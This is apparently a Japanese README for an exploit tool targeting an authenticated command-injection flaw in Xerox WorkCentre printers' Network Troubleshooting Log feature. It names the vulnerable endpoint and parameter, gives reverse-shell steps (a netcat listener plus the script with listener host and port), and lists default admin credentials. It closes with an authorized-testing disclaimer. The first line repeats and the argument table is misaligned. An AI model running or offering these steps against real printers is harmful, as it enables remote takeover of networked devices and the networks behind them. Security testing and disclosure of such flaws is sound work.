
Xerox WorkCentre プリンターの Network Troubleshooting Log 機能における認証済みリモートコード実行の脆弱性。
Xerox WorkCentre プリンターの Network Troubleshooting Log 機能における認証済みリモートコード実行の脆弱性。
Network Troubleshooting Log 機能 (/properties/security/network_troubleshooting_log.php) は、宛先サーバーパラメータ (security.nwtroubleshoot.destination.server) をサニタイズしないため、認証済み管理者が任意の OS コマンドを注入できます。ネットワークログキャプチャが開始されると、注入されたペイロードがシェルコマンドとして実行され、リモートコード実行に至ります。
073.110.019.14200 でテスト済み)pip install -r requirements.txt
お使いのマシンでリスナーを起動します:
nc -lvnp 8443
エクスプロイトを実行します:
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443
このツールは、許可されたセキュリティテストおよび教育目的のみに提供されます。コンピューターシステムへの不正アクセスは違法です。
| 引数 | 必須 | デフォルト | 説明 |
|---|
--target | はい | 対象 URL (例: https://192.0.2.1) | |
--lhost | はい | リスナー IP アドレス | |
--lport | いいえ | 8443 | リスナーポート |
--user | いいえ | admin | 管理者ユーザー名 |
--password | いいえ | 1111 | 管理者パスワード |
--proxy | いいえ | プロキシ URL (例: http://127.0.0.1:8080) |